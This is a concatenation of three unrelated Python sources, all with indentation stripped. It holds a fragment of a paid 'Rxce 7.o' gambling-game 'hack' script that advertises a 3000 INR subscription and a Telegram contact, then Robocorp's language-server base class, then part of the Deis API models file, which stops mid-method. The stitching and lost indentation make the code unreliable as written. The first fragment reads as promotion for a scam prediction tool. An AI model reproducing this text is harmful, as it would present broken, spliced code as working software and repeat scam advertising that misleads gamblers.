if(y==0):
y=False
if (len(numbers)>15):
clear()
system('figlet Thank you!!')
print("Play on next specified time!!")
print("-----------Current Time UP----------")
sys.exit(" \n \n \n Contact on Telegram @Hackmgk")
print(numbers)
if(expirydate>today):
now = datetime.datetime.now()
First = now.replace(hour=10, minute=55, second=0, microsecond=0)
Firstend = now.replace(hour=11, minute=35, second=0, microsecond=0)
Second = now.replace(hour=13, minute=55, second=0, microsecond=0)
Secondend = now.replace(hour=14, minute=35, second=0, microsecond=0)
Third = now.replace(hour=16, minute=55, second=0, microsecond=0)
Thirdend = now.replace(hour=17, minute=35, second=0, microsecond=0)
Final = now.replace(hour=19, minute=55, second=0, microsecond=0)
Finalend = now.replace(hour=20, minute=35, second=0, microsecond= 0)
FFinal = now.replace(hour=22, minute=55, second=0, microsecond= 0)
FFinalend = now.replace(hour=23, minute=35, second=0, microsecond= 0)
if (now>First and now<Firstend):
period=220
hero()
elif(now>Second and now<Secondend):
period=280
hero()
elif(now>Third and now<Thirdend):
period=340
hero()
elif(now>Final and now<Finalend):
period=400
hero()
elif(now>FFinal and now<FFinalend):
period=460
hero()
else:
banner='figlet Rxce 7.o '
print("Hi!! Thanks for buying Life time the hack")
print("----------Your play time-----------")
print(" 11:00 PM- 11:35 PM")
print(" 02:00 PM- 02:35 PM")
print(" 05:00 PM- 05:35 PM")
print(" 08:00 PM- 08:35 PM")
print(" 11:00 PM- 12:35 PM")
print("Please play on the given time, and ")
print("If you think it is an error contact")
print(" admin on telegram @Hackmgk ")
else:
banner='figlet Thank '
system(banner)
print("*---------*----------*-------------*----------*")
print("Your hack has expired--- Please contact")
print(" on telegram ----@hackmgk for activating")
print(" Recharge Amount : Total limit " )
print(" 2. 3000 INR ------- 30 Days")
print("*---------*----------*-------------*----------*")
print("Your custom hack can be made request from us.")
print( "Msg me on telegram @hackmgk")
|
python_ls.py
|
# Original work Copyright 2017 Palantir Technologies, Inc. (MIT)
# See ThirdPartyNotices.txt in the project root for license information.
# All modifications Copyright (c) Robocorp Technologies Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
from robocorp_ls_core.robotframework_log import get_logger
from robocorp_ls_core.protocols import IConfig, IWorkspace
from typing import Optional
import socketserver
import threading
from robocorp_ls_core.jsonrpc.dispatchers import MethodDispatcher
from robocorp_ls_core.jsonrpc.endpoint import Endpoint
from robocorp_ls_core.jsonrpc.streams import JsonRpcStreamReader, JsonRpcStreamWriter
from robocorp_ls_core import uris
log = get_logger(__name__)
class _StreamHandlerWrapper(socketserver.StreamRequestHandler, object):
"""A wrapper class that is used to construct a custom handler class."""
delegate = None
def setup(self):
super(_StreamHandlerWrapper, self).setup()
self.delegate = self.DELEGATE_CLASS(self.rfile, self.wfile) # noqa
def handle(self):
try:
self.delegate.start()
except OSError as e:
if os.name == "nt":
# Catch and pass on ConnectionResetError when parent process
# dies
if isinstance(e, WindowsError) and e.winerror == 10054:
pass
self.SHUTDOWN_CALL() # noqa
class _DummyStdin(object):
def __init__(self, original_stdin=sys.stdin, *args, **kwargs):
try:
self.encoding = sys.stdin.encoding
except:
# Not sure if it's available in all Python versions...
pass
self.original_stdin = original_stdin
try:
self.errors = (
sys.stdin.errors
) # Who knew? sys streams have an errors attribute!
except:
# Not sure if it's available in all Python versions...
pass
def readline(self, *args, **kwargs):
return "\n"
def read(self, *args, **kwargs):
return self.readline()
def write(self, *args, **kwargs):
pass
def flush(self, *args, **kwargs):
pass
def close(self, *args, **kwargs):
pass
def binary_stdio():
"""Construct binary stdio streams (not text mode).
This seems to be different for Window/Unix Python2/3, so going by:
https://stackoverflow.com/questions/2850893/reading-binary-data-from-stdin
"""
PY3K = sys.version_info >= (3, 0)
if PY3K:
stdin, stdout = sys.stdin.buffer, sys.stdout.buffer
else:
# Python 2 on Windows opens sys.stdin in text mode, and
# binary data that read from it becomes corrupted on \r\n
if sys.platform == "win32":
# set sys.stdin to binary mode
import msvcrt
msvcrt.setmode(sys.stdin.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
stdin, stdout = sys.stdin, sys.stdout
sys.stdin, sys.stdout = (_DummyStdin(), open(os.devnull, "w"))
return stdin, stdout
def start_tcp_lang_server(
bind_addr, port, handler_class, after_bind=lambda server: None
):
"""
:param bind_addr:
:param port:
:param handler_class:
:param after_bind:
Called right after server.bind (so, it's possible to get the port with
server.socket.getsockname() if port 0 was passed).
"""
def create_handler(_, *args, **kwargs):
method_dispatcher = handler_class(*args, **kwargs)
if not isinstance(method_dispatcher, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
return method_dispatcher
def shutdown_server(*args):
log.debug("Shutting down server")
# Shutdown call must be done on a thread, to prevent deadlocks
stop_thread = threading.Thread(target=server.shutdown)
stop_thread.start()
# Construct a custom wrapper class around the user's handler_class
wrapper_class = type(
handler_class.__name__ + "Handler",
(_StreamHandlerWrapper,),
{"DELEGATE_CLASS": create_handler, "SHUTDOWN_CALL": shutdown_server},
)
server = socketserver.TCPServer(
(bind_addr, port), wrapper_class, bind_and_activate=False
)
server.allow_reuse_address = True
try:
server.server_bind()
server.server_activate()
after_bind(server)
log.info(
"Serving %s on (%s, %s) - pid: %s",
handler_class.__name__,
bind_addr,
port,
os.getpid(),
)
server.serve_forever()
finally:
log.info("Shutting down")
server.server_close()
def start_io_lang_server(rfile, wfile, handler_class):
if not issubclass(handler_class, MethodDispatcher):
raise ValueError("Handler class must be an instance of MethodDispatcher")
log.info(
"Starting %s IO language server. pid: %s", handler_class.__name__, os.getpid()
)
server = handler_class(rfile, wfile)
server.start()
class PythonLanguageServer(MethodDispatcher):
""" Implementation of the Microsoft VSCode Language Server Protocol
https://github.com/Microsoft/language-server-protocol/blob/master/versions/protocol-1-x.md
Based on: https://github.com/palantir/python-language-server/blob/develop/pyls/python_ls.py
"""
def __init__(self, read_stream, write_stream):
from robocorp_ls_core.lsp import LSPMessages
self._config: IConfig = self._create_config()
self._workspace: Optional[IWorkspace] = None
self.root_uri = None
self.watching_thread = None
self.uri_workspace_mapper = {}
self._jsonrpc_stream_reader = JsonRpcStreamReader(read_stream)
self._jsonrpc_stream_writer = JsonRpcStreamWriter(write_stream)
self._endpoint = Endpoint(self, self._jsonrpc_stream_writer.write)
self._lsp_messages = LSPMessages(self._endpoint)
self._shutdown = False
@property
def workspace(self) -> Optional[IWorkspace]:
return self._workspace
@workspace.setter
def workspace(self, workspace: IWorkspace) -> None:
self._workspace = workspace
self._on_workspace_set(workspace)
def _on_workspace_set(self, workspace: IWorkspace):
pass
@property # i.e.: read-only
def config(self) -> IConfig:
return self._config
def start(self):
"""Entry point for the server."""
self._jsonrpc_stream_reader.listen(self._endpoint.consume)
def m_shutdown(self, **_kwargs):
self._shutdown = True
def m_exit(self, **_kwargs):
self._endpoint.shutdown()
# If there's someone reading, we could deadlock here.
self._jsonrpc_stream_reader.close()
self._jsonrpc_stream_writer.close()
def capabilities(self):
return {} # Subclasses should override for capabilities.
def m_initialize(
self,
processId=None,
rootUri=None,
rootPath=None,
initializationOptions=None,
workspaceFolders=None,
**_kwargs,
) -> dict:
from robocorp_ls_core.basic import exit_when_pid_exists
from robocorp_ls_core.lsp import WorkspaceFolder
log.debug(
"Language server initialized with:\n processId: %s\n rootUri: %s\n rootPath: %s\n initializationOptions: %s\n workspaceFolders: %s",
processId,
rootUri,
rootPath,
initializationOptions,
workspaceFolders,
)
if rootUri is None:
rootUri = uris.from_fs_path(rootPath) if rootPath is not None else ""
self.root_uri = rootUri
if workspaceFolders:
workspaceFolders = [WorkspaceFolder(**w) for w in workspaceFolders]
self.workspace = self._create_workspace(rootUri, workspaceFolders or [])
if processId not in (None, -1, 0):
exit_when_pid_exists(processId)
# Get our capabilities
return {"capabilities": self.capabilities()}
def _create_config(self) -> IConfig:
raise NotImplementedError(f"Not implemented in: {self.__class__}")
def _create_workspace(self, root_uri, workspace_folders) -> IWorkspace:
from robocorp_ls_core.workspace import Workspace
return Workspace(root_uri, workspace_folders)
def m_initialized(self, **_kwargs):
pass
def lint(self, doc_uri, is_saved):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def cancel_lint(self, doc_uri):
raise NotImplementedError(
"Subclasses must override (current class: %s)." % (self.__class__,)
)
def m_text_document__did_close(self, textDocument=None, **_kwargs) -> None:
ws = self.workspace
doc_uri = textDocument["uri"]
if ws is not None:
ws.remove_document(doc_uri)
self.cancel_lint(doc_uri)
def m_text_document__did_open(self, textDocument=None, **_kwargs) -> None:
from robocorp_ls_core.lsp import TextDocumentItem
ws = self.workspace
if ws is not None:
ws.put_document(TextDocumentItem(**textDocument))
self.lint(textDocument["uri"], is_saved=True)
def m_text_document__did_change(
self, contentChanges=None, textDocument=None, **_kwargs
):
from robocorp_ls_core.lsp import TextDocumentItem
from robocorp_ls_core.lsp import TextDocumentContentChangeEvent
if contentChanges:
text_document_item = TextDocumentItem(**textDocument)
for change in contentChanges:
try:
range = change.get("range", None)
range_length = change.get("rangeLength", 0)
text = change.get("text", "")
self.workspace.update_document(
text_document_item,
TextDocumentContentChangeEvent(
range=range, rangeLength=range_length, text=text
),
)
except:
log.exception(
"Error updating document: %s with changes: %s"
% (textDocument, contentChanges)
)
self.lint(textDocument["uri"], is_saved=False)
def m_text_document__did_save(self, textDocument=None, **_kwargs):
self.lint(textDocument["uri"], is_saved=True)
def m_workspace__did_change_configuration(self, settings=None) -> None:
self.config.update(settings or {})
def m_workspace__did_change_workspace_folders(self, event=None):
"""Adds/Removes folders from the workspace."""
from robocorp_ls_core.lsp import WorkspaceFolder
log.info(f"Workspace folders changed: {event}")
added_folders = []
removed_folders = []
if event:
added_folders = event.get("added", [])
removed_folders = event.get("removed", [])
for f_add in added_folders:
self.workspace.add_folder(WorkspaceFolder(**f_add))
for f_remove in removed_folders:
self.workspace.remove_folder(f_remove["uri"])
def m_workspace__did_change_watched_files(self, changes=None, **_kwargs):
pass
|
models.py
|
# -*- coding: utf-8 -*-
"""
Data models for the Deis API.
"""
from __future__ import unicode_literals
import base64
from datetime import datetime
import etcd
import importlib
import logging
import re
import time
from threading import Thread
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ValidationError, SuspiciousOperation
from django.db import models
from django.db.models import Count
from django.db.models import Max
from django.db.models.signals import post_delete, post_save
from django.dispatch import receiver
from django.utils.encoding import python_2_unicode_compatible
from docker.utils import utils as dockerutils
from json_field.fields import JSONField
from OpenSSL import crypto
import requests
from rest_framework.authtoken.models import Token
from api import fields, utils, exceptions
from registry import publish_release
from utils import dict_diff, fingerprint
logger = logging.getLogger(__name__)
def close_db_connections(func, *args, **kwargs):
"""
Decorator to explicitly close db connections during threaded execution
Note this is necessary to work around:
https://code.djangoproject.com/ticket/22420
"""
def _close_db_connections(*args, **kwargs):
ret = None
try:
ret = func(*args, **kwargs)
finally:
from django.db import connections
for conn in connections.all():
conn.close()
return ret
return _close_db_connections
def log_event(app, msg, level=logging.INFO):
# controller needs to know which app this log comes from
logger.log(level, "{}: {}".format(app.id, msg))
app.log(msg, level)
def validate_base64(value):
"""Check that value contains only valid base64 characters."""
try:
base64.b64decode(value.split()[1])
except Exception as e:
raise ValidationError(e)
def validate_id_is_docker_compatible(value):
"""
Check that the ID follows docker's image name constraints
"""
match = re.match(r'^[a-z0-9-]+$', value)
if not match:
raise ValidationError("App IDs can only contain [a-z0-9-].")
def validate_app_structure(value):
"""Error if the dict values aren't ints >= 0."""
try:
if any(int(v) < 0 for v in value.viewvalues()):
raise ValueError("Must be greater than or equal to zero")
except ValueError, err:
raise ValidationError(err)
def validate_reserved_names(value):
"""A value cannot use some reserved names."""
if value in settings.DEIS_RESERVED_NAMES:
raise ValidationError('{} is a reserved name.'.format(value))
def validate_comma_separated(value):
"""Error if the value doesn't look like a list of hostnames or IP addresses
separated by commas.
"""
if not re.search(r'^[a-zA-Z0-9-,\.]+$', value):
raise ValidationError(
"{} should be a comma-separated list".format(value))
def validate_domain(value):
"""Error if the domain contains unexpected characters."""
if not re.search(r'^[a-zA-Z0-9-\.]+$', value):
raise ValidationError('"{}" contains unexpected characters'.format(value))
def validate_certificate(value):
try:
crypto.load_certificate(crypto.FILETYPE_PEM, value)
except crypto.Error as e:
raise ValidationError('Could not load certificate: {}'.format(e))
def validate_common_name(value):
if '*' in value:
raise ValidationError('Wildcard certificates are not supported')
def get_etcd_client():
if not hasattr(get_etcd_client, "client"):
# wire up etcd publishing if we can connect
try:
get_etcd_client.client = etcd.Client(
host=settings.ETCD_HOST,
port=int(settings.ETCD_PORT))
get_etcd_client.client.get('/deis')
except etcd.EtcdException:
logger.log(logging.WARNING, 'Cannot synchronize with etcd cluster')
get_etcd_client.client = None
return get_etcd_client.client
class AuditedModel(models.Model):
"""Add created and updated fields to a model."""
created = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
class Meta:
"""Mark :class:`AuditedModel` as abstract."""
abstract = True
def select_app_name():
"""Select a unique randomly generated app name"""
name = utils.generate_app_name()
while App.objects.filter(id=name).exists():
name = utils.generate_app_name()
return name
class UuidAuditedModel(AuditedModel):
"""Add a UUID primary key to an :class:`AuditedModel`."""
uuid = fields.UuidField('UUID', primary_key=True)
class Meta:
"""Mark :class:`UuidAuditedModel` as abstract."""
abstract = True
@python_2_unicode_compatible
class App(UuidAuditedModel):
"""
Application used to service requests on behalf of end-users
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
id = models.SlugField(max_length=64, unique=True, default=select_app_name,
validators=[validate_id_is_docker_compatible,
validate_reserved_names])
structure = JSONField(default={}, blank=True, validators=[validate_app_structure])
class Meta:
permissions = (('use_app', 'Can use app'),)
@property
def _scheduler(self):
mod = importlib.import_module(settings.SCHEDULER_MODULE)
return mod.SchedulerClient(settings.SCHEDULER_TARGET,
settings.SCHEDULER_AUTH,
settings.SCHEDULER_OPTIONS,
settings.SSH_PRIVATE_KEY)
def __str__(self):
return self.id
@property
def url(self):
return self.id + '.' + settings.DEIS_DOMAIN
def _get_job_id(self, container_type):
app = self.id
release = self.release_set.latest()
version = "v{}".format(release.version)
job_id = "{app}_{version}.{container_type}".format(**locals())
return job_id
def _get_command(self, container_type):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
release = self.release_set.latest()
if release.build.dockerfile or not release.build.sha:
return "bash -c '{}'".format(release.build.procfile[container_type])
else:
return 'start {}'.format(container_type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if container_type == 'cmd' else 'start {}'.format(container_type)
def log(self, message, level=logging.INFO):
"""Logs a message in the context of this application.
This prefixes log messages with an application "tag" that the customized deis-logspout will
be on the lookout for. When it's seen, the message-- usually an application event of some
sort like releasing or scaling, will be considered as "belonging" to the application
instead of the controller and will be handled accordingly.
"""
logger.log(level, "[{}]: {}".format(self.id, message))
def create(self, *args, **kwargs):
"""Create a new application with an initial config and release"""
config = Config.objects.create(owner=self.owner, app=self)
Release.objects.create(version=1, owner=self.owner, app=self, config=config, build=None)
def delete(self, *args, **kwargs):
"""Delete this application including all containers"""
try:
# attempt to remove containers from the scheduler
self._destroy_containers([c for c in self.container_set.exclude(type='run')])
except RuntimeError:
pass
self._clean_app_logs()
return super(App, self).delete(*args, **kwargs)
def restart(self, **kwargs):
to_restart = self.container_set.all()
if kwargs.get('type'):
to_restart = to_restart.filter(type=kwargs.get('type'))
if kwargs.get('num'):
to_restart = to_restart.filter(num=kwargs.get('num'))
self._restart_containers(to_restart)
return to_restart
def _clean_app_logs(self):
"""Delete application logs stored by the logger component"""
try:
url = 'http://{}:{}/{}/'.format(settings.LOGGER_HOST, settings.LOGGER_PORT, self.id)
requests.delete(url)
except Exception as e:
# Ignore errors deleting application logs. An error here should not interfere with
# the overall success of deleting an application, but we should log it.
err = 'Error deleting existing application logs: {}'.format(e)
log_event(self, err, logging.WARNING)
def scale(self, user, structure): # noqa
"""Scale containers up or down to match requested structure."""
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release')
requested_structure = structure.copy()
release = self.release_set.latest()
# test for available process types
available_process_types = release.build.procfile or {}
for container_type in requested_structure:
if container_type == 'cmd':
continue # allow docker cmd types in case we don't have the image source
if container_type not in available_process_types:
raise EnvironmentError(
'Container type {} does not exist in application'.format(container_type))
msg = '{} scaled containers '.format(user.username) + ' '.join(
"{}={}".format(k, v) for k, v in requested_structure.items())
log_event(self, msg)
# iterate and scale by container type (web, worker, etc)
changed = False
to_add, to_remove = [], []
scale_types = {}
# iterate on a copy of the container_type keys
for container_type in requested_structure.keys():
containers = list(self.container_set.filter(type=container_type).order_by('created'))
# increment new container nums off the most recent container
results = self.container_set.filter(type=container_type).aggregate(Max('num'))
container_num = (results.get('num__max') or 0) + 1
requested = requested_structure.pop(container_type)
diff = requested - len(containers)
if diff == 0:
continue
changed = True
scale_types[container_type] = requested
while diff < 0:
c = containers.pop()
to_remove.append(c)
diff += 1
while diff > 0:
# create a database record
c = Container.objects.create(owner=self.owner,
app=self,
release=release,
type=container_type,
num=container_num)
to_add.append(c)
container_num += 1
diff -= 1
if changed:
if "scale" in dir(self._scheduler):
self._scale_containers(scale_types, to_remove)
else:
if to_add:
self._start_containers(to_add)
if to_remove:
self._destroy_containers(to_remove)
# save new structure to the database
vals = self.container_set.exclude(type='run').values(
'type').annotate(Count('pk')).order_by()
new_structure = structure.copy()
new_structure.update({v['type']: v['pk__count'] for v in vals})
self.structure = new_structure
self.save()
return changed
def _scale_containers(self, scale_types, to_remove):
release = self.release_set.latest()
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'version': version,
'aname': self.id,
'num': scale_types[scale_type]}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.scale(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (scale): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in to_remove]
def _start_containers(self, to_add):
"""Creates and starts containers via the scheduler"""
if not to_add:
return
create_threads = [Thread(target=c.create) for c in to_add]
start_threads = [Thread(target=c.start) for c in to_add]
[t.start() for t in create_threads]
[t.join() for t in create_threads]
if any(c.state != 'created' for c in to_add):
err = 'aborting, failed to create some containers'
log_event(self, err, logging.ERROR)
self._destroy_containers(to_add)
raise RuntimeError(err)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if set([c.state for c in to_add]) != set(['up']):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
# if the user specified a health check, try checking to see if it's running
try:
config = self.config_set.latest()
if 'HEALTHCHECK_URL' in config.values.keys():
self._healthcheck(to_add, config.values)
except Config.DoesNotExist:
pass
def _healthcheck(self, containers, config):
# if at first it fails, back off and try again at 10%, 50% and 100% of INITIAL_DELAY
intervals = [1.0, 0.1, 0.5, 1.0]
# HACK (bacongobbler): we need to wait until publisher has a chance to publish each
# service to etcd, which can take up to 20 seconds.
time.sleep(20)
for i in xrange(len(intervals)):
delay = int(config.get('HEALTHCHECK_INITIAL_DELAY', 0))
try:
# sleep until the initial timeout is over
if delay > 0:
time.sleep(delay * intervals[i])
to_healthcheck = [c for c in containers if c.type in ['web', 'cmd']]
self._do_healthcheck(to_healthcheck, config)
break
except exceptions.HealthcheckException as e:
try:
next_delay = delay * intervals[i+1]
msg = "{}; trying again in {} seconds".format(e, next_delay)
log_event(self, msg, logging.WARNING)
except IndexError:
log_event(self, e, logging.WARNING)
else:
self._destroy_containers(containers)
msg = "aborting, app containers failed to respond to health check"
log_event(self, msg, logging.ERROR)
raise RuntimeError(msg)
def _do_healthcheck(self, containers, config):
path = config.get('HEALTHCHECK_URL', '/')
timeout = int(config.get('HEALTHCHECK_TIMEOUT', 1))
if not _etcd_client:
raise exceptions.HealthcheckException('no etcd client available')
for container in containers:
try:
key = "/deis/services/{self}/{container.job_id}".format(**locals())
url = "http://{}{}".format(_etcd_client.get(key).value, path)
response = requests.get(url, timeout=timeout)
if response.status_code != requests.codes.OK:
raise exceptions.HealthcheckException(
"app failed health check (got '{}', expected: '200')".format(
response.status_code))
except (requests.Timeout, requests.ConnectionError, KeyError) as e:
raise exceptions.HealthcheckException(
'failed to connect to container ({})'.format(e))
def _restart_containers(self, to_restart):
"""Restarts containers via the scheduler"""
if not to_restart:
return
stop_threads = [Thread(target=c.stop) for c in to_restart]
start_threads = [Thread(target=c.start) for c in to_restart]
[t.start() for t in stop_threads]
[t.join() for t in stop_threads]
if any(c.state != 'created' for c in to_restart):
err = 'warning, some containers failed to stop'
log_event(self, err, logging.WARNING)
[t.start() for t in start_threads]
[t.join() for t in start_threads]
if any(c.state != 'up' for c in to_restart):
err = 'warning, some containers failed to start'
log_event(self, err, logging.WARNING)
def _destroy_containers(self, to_destroy):
"""Destroys containers via the scheduler"""
if not to_destroy:
return
destroy_threads = [Thread(target=c.destroy) for c in to_destroy]
[t.start() for t in destroy_threads]
[t.join() for t in destroy_threads]
pks = [c.pk for c in to_destroy if c.state == 'destroyed']
Container.objects.filter(pk__in=pks).delete()
if any(c.state != 'destroyed' for c in to_destroy):
err = 'aborting, failed to destroy some containers'
log_event(self, err, logging.ERROR)
raise RuntimeError(err)
def deploy(self, user, release):
"""Deploy a new release to this application"""
existing = self.container_set.exclude(type='run')
new = []
scale_types = set()
for e in existing:
n = e.clone(release)
n.save()
new.append(n)
scale_types.add(e.type)
if new and "deploy" in dir(self._scheduler):
self._deploy_app(scale_types, release, existing)
else:
self._start_containers(new)
# destroy old containers
if existing:
self._destroy_containers(existing)
# perform default scaling if necessary
if self.structure == {} and release.build is not None:
self._default_scale(user, release)
def _deploy_app(self, scale_types, release, existing):
for scale_type in scale_types:
image = release.image
version = "v{}".format(release.version)
kwargs = {'memory': release.config.memory,
'cpu': release.config.cpu,
'tags': release.config.tags,
'aname': self.id,
'num': 0,
'version': version}
job_id = self._get_job_id(scale_type)
command = self._get_command(scale_type)
try:
self._scheduler.deploy(
name=job_id,
image=image,
command=command,
**kwargs)
except Exception as e:
err = '{} (deploy): {}'.format(job_id, e)
log_event(self, err, logging.ERROR)
raise
[c.delete() for c in existing]
def _default_scale(self, user, release):
"""Scale to default structure based on release type"""
# if there is no SHA, assume a docker image is being promoted
if not release.build.sha:
structure = {'cmd': 1}
# if a dockerfile exists without a procfile, assume docker workflow
elif release.build.dockerfile and not release.build.procfile:
structure = {'cmd': 1}
# if a procfile exists without a web entry, assume docker workflow
elif release.build.procfile and 'web' not in release.build.procfile:
structure = {'cmd': 1}
# default to heroku workflow
else:
structure = {'web': 1}
self.scale(user, structure)
def logs(self, log_lines=str(settings.LOG_LINES)):
"""Return aggregated log data for this application."""
try:
url = "http://{}:{}/{}?log_lines={}".format(settings.LOGGER_HOST, settings.LOGGER_PORT,
self.id, log_lines)
r = requests.get(url)
# Handle HTTP request errors
except requests.exceptions.RequestException as e:
logger.error("Error accessing deis-logger using url '{}': {}".format(url, e))
raise e
# Handle logs empty or not found
if r.status_code == 204 or r.status_code == 404:
logger.info("GET {} returned a {} status code".format(url, r.status_code))
raise EnvironmentError('Could not locate logs')
# Handle unanticipated status codes
if r.status_code != 200:
logger.error("Error accessing deis-logger: GET {} returned a {} status code"
.format(url, r.status_code))
raise EnvironmentError('Error accessing deis-logger')
return r.content
def run(self, user, command):
"""Run a one-off command in an ephemeral app container."""
# FIXME: remove the need for SSH private keys by using
# a scheduler that supports one-off admin tasks natively
if not settings.SSH_PRIVATE_KEY:
raise EnvironmentError('Support for admin commands is not configured')
if self.release_set.latest().build is None:
raise EnvironmentError('No build associated with this release to run this command')
# TODO: add support for interactive shell
msg = "{} runs '{}'".format(user.username, command)
log_event(self, msg)
c_num = max([c.num for c in self.container_set.filter(type='run')] or [0]) + 1
# create database record for run process
c = Container.objects.create(owner=self.owner,
app=self,
release=self.release_set.latest(),
type='run',
num=c_num)
image = c.release.image
# check for backwards compatibility
def _has_hostname(image):
repo, tag = dockerutils.parse_repository_tag(image)
return True if '/' in repo and '.' in repo.split('/')[0] else False
if not _has_hostname(image):
image = '{}:{}/{}'.format(settings.REGISTRY_HOST,
settings.REGISTRY_PORT,
image)
# SECURITY: shell-escape user input
escaped_command = command.replace("'", "'\\''")
return c.run(escaped_command)
@python_2_unicode_compatible
class Container(UuidAuditedModel):
"""
Docker container used to securely host an application process.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
release = models.ForeignKey('Release')
type = models.CharField(max_length=128, blank=False)
num = models.PositiveIntegerField()
@property
def _scheduler(self):
return self.app._scheduler
@property
def state(self):
return self._scheduler.state(self.job_id).name
def short_name(self):
return "{}.{}.{}".format(self.app.id, self.type, self.num)
short_name.short_description = 'Name'
def __str__(self):
return self.short_name()
class Meta:
get_latest_by = '-created'
ordering = ['created']
@property
def job_id(self):
version = "v{}".format(self.release.version)
return "{self.app.id}_{version}.{self.type}.{self.num}".format(**locals())
def _get_command(self):
try:
# if this is not procfile-based app, ensure they cannot break out
# and run arbitrary commands on the host
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.dockerfile or not self.release.build.sha:
return "bash -c '{}'".format(self.release.build.procfile[self.type])
else:
return 'start {}'.format(self.type)
# if the key is not present or if a parent attribute is None
except (KeyError, TypeError, AttributeError):
# handle special case for Dockerfile deployments
return '' if self.type == 'cmd' else 'start {}'.format(self.type)
_command = property(_get_command)
def clone(self, release):
c = Container.objects.create(owner=self.owner,
app=self.app,
release=release,
type=self.type,
num=self.num)
return c
@close_db_connections
def create(self):
image = self.release.image
kwargs = {'memory': self.release.config.memory,
'cpu': self.release.config.cpu,
'tags': self.release.config.tags}
try:
self._scheduler.create(
name=self.job_id,
image=image,
command=self._command,
**kwargs)
except Exception as e:
err = '{} (create): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def start(self):
try:
self._scheduler.start(self.job_id)
except Exception as e:
err = '{} (start): {}'.format(self.job_id, e)
log_event(self.app, err, logging.WARNING)
raise
@close_db_connections
def stop(self):
try:
self._scheduler.stop(self.job_id)
except Exception as e:
err = '{} (stop): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@close_db_connections
def destroy(self):
try:
self._scheduler.destroy(self.job_id)
except Exception as e:
err = '{} (destroy): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
def run(self, command):
"""Run a one-off command"""
if self.release.build is None:
raise EnvironmentError('No build associated with this release '
'to run this command')
image = self.release.image
entrypoint = '/bin/bash'
# if this is a procfile-based app, switch the entrypoint to slugrunner's default
# FIXME: remove slugrunner's hardcoded entrypoint
if self.release.build.procfile and \
self.release.build.sha and not \
self.release.build.dockerfile:
entrypoint = '/runner/init'
command = "'{}'".format(command)
else:
command = "-c '{}'".format(command)
try:
rc, output = self._scheduler.run(self.job_id, image, entrypoint, command)
return rc, output
except Exception as e:
err = '{} (run): {}'.format(self.job_id, e)
log_event(self.app, err, logging.ERROR)
raise
@python_2_unicode_compatible
class Push(UuidAuditedModel):
"""
Instance of a push used to trigger an application build
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
sha = models.CharField(max_length=40)
fingerprint = models.CharField(max_length=255)
receive_user = models.CharField(max_length=255)
receive_repo = models.CharField(max_length=255)
ssh_connection = models.CharField(max_length=255)
ssh_original_command = models.CharField(max_length=255)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.sha[:7])
@python_2_unicode_compatible
class Build(UuidAuditedModel):
"""
Instance of a software build used by runtime nodes
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
image = models.CharField(max_length=256)
# optional fields populated by builder
sha = models.CharField(max_length=40, blank=True)
procfile = JSONField(default={}, blank=True)
dockerfile = models.TextField(blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def create(self, user, *args, **kwargs):
latest_release = self.app.release_set.latest()
source_version = 'latest'
if self.sha:
source_version = 'git-{}'.format(self.sha)
new_release = latest_release.new(user,
build=self,
config=latest_release.config,
source_version=source_version)
try:
self.app.deploy(user, new_release)
return new_release
except RuntimeError:
new_release.delete()
raise
def save(self, **kwargs):
try:
previous_build = self.app.build_set.latest()
to_destroy = []
for proctype in previous_build.procfile:
if proctype not in self.procfile:
for c in self.app.container_set.filter(type=proctype):
to_destroy.append(c)
self.app._destroy_containers(to_destroy)
except Build.DoesNotExist:
pass
return super(Build, self).save(**kwargs)
def __str__(self):
return "{0}-{1}".format(self.app.id, self.uuid[:7])
@python_2_unicode_compatible
class Config(UuidAuditedModel):
"""
Set of configuration values applied as environment variables
during runtime execution of the Application.
"""
owner = models.ForeignKey(settings.AUTH_USER_MODEL)
app = models.ForeignKey('App')
values = JSONField(default={}, blank=True)
memory = JSONField(default={}, blank=True)
cpu = JSONField(default={}, blank=True)
tags = JSONField(default={}, blank=True)
class Meta:
get_latest_by = 'created'
ordering = ['-created']
unique_together = (('app', 'uuid'),)
def __str__(self):
return "{}-{}".format(self.app.id, self.uuid[:7])
def save(self, **kwargs):
"""merge the old config with the new"""
try:
